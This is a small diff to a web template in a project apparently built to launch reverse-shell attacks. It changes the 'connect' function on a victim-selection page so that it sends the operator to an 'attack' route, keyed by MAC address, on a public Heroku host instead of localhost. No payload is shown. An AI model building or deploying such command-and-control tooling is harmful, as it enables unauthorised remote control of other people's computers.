--- a/reverse_shell/templates/choose_victim.html
+++ b/reverse_shell/templates/choose_victim.html
@@ -13,7 +13,7 @@
     </ul>
 <script>
     function connect(mac_address) {
-        window.location.assign('http://localhost:8000/reverse_shell/attack/' + mac_address + '/');
+        window.location.assign('https://intense-river-70224.herokuapp.com/reverse_shell/attack/' + mac_address + '/');
     }
 </script>
 {% endblock %}
